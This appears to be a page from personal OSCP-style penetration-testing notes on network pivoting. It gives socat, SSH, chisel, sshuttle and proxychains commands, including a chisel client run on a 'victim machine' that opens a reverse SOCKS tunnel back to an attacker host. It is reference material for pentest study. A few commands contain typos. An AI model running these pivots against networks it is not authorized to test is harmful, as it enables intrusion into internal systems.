Pivoting

Port Forwarding

The goal is to redirect packet from one port to another port.



# from ipv4 to ipv6, all packet to localhost:445 will direct to <ipv6>:445
sudo socat TCP-LISTEN:445, fork TCP:<ipv6>:445

ssh to kali machine

note:

local-port and local-machine in the kali machine (attacker)

ssh -R -N <local-port>:127.0.0.1:<service-port> root@<local-machine>

Reverse Proxy

chisel

ref: https://www.youtube.com/watch?v=dIqoULXmhXg

Releases · jpillora/chiselGitHub

Attacker (Kali)

./chisel server -p 8000 --reverse

Run in Victim Machine

Windows

chisel.exe client <attacker ip>:8000 R:socks

Linux

./chisel client <attacker ip>:8000 R:sockss

Config the proxychains (Attacker)

change /etc/proxychains4.conf

[ProxyList]
socks5 127.0.0.1 1080

Run command

proxychains nmap -sT -p 88 -Pn -n <machine 2 ip>

sshuttle

Need (user login as ssh)

# single
sshuttle -r username@remotehost 0.0.0.0/0
# example
sshuttle user@192.168.20.35 192.168.30.0/24

sshuttle -r root@10.1.1.1 10.2.2.0/24

Hacking/OSCP cheatsheetMedium

SSH Tunnel

nice ref:https://www.isabekov.pro/reverse-ssh-tunnel/

Can't ssh to machine?

ssh -p 22 -R "<attacker port>:<host port>

Forward Proxy

chisel

sshuttle

Use sshuttle to build a poor man's VPN - Fedora MagazineFedora Magazine

SSH Tunnel (Recommended if you wanna access internal port)

Forward Proxy

Need SSH to machine:

ssh -D <local port> <user>@<IP of victim you have>

#example 
ssh -D 8989 local@10.10.10.10

It mean, every packet to 127.0.0.1:8989 will be forwarded as IP 10.10.10.10

You can set proxy on your browser or proxychains.conf

[Manual Proxy]
socks4 127.0.0.1 8989

Don't forget to using incognito to your browser or clear cache, for better process.

If that internal port have vhost configuration, you must set up that /etc/hosts on kali linux with pointing to local port (/etc/hosts on victim machine).

Case of forward proxy

Bypass the Firewall with SSH TunnellingMedium

Are you stuck?

https://resources.infosecinstitute.com/topic/tunneling-and-port-forwarding-tools-used-during-red-teaming-assessments/resources.infosecinstitute.com

Network Pentest with Chisel

https://notes.benheater.com/books/network-pivoting/page/penetrating-networks-via-chisel-proxies

PreviousImpersonate Token NextPivot in a Case

Last updated 2 years ago

hashtagPort Forwarding

hashtag

hashtagReverse Proxy

hashtagchisel

hashtagsshuttle

hashtagSSH Tunnel

hashtagForward Proxy

hashtagchisel

hashtagsshuttle

hashtagSSH Tunnel (Recommended if you wanna access internal port)

hashtagAre you stuck?

hashtagNetwork Pentest with Chisel

Port Forwarding

Reverse Proxy

chisel

sshuttle

SSH Tunnel

Forward Proxy

chisel

sshuttle

SSH Tunnel (Recommended if you wanna access internal port)

Are you stuck?

Network Pentest with Chisel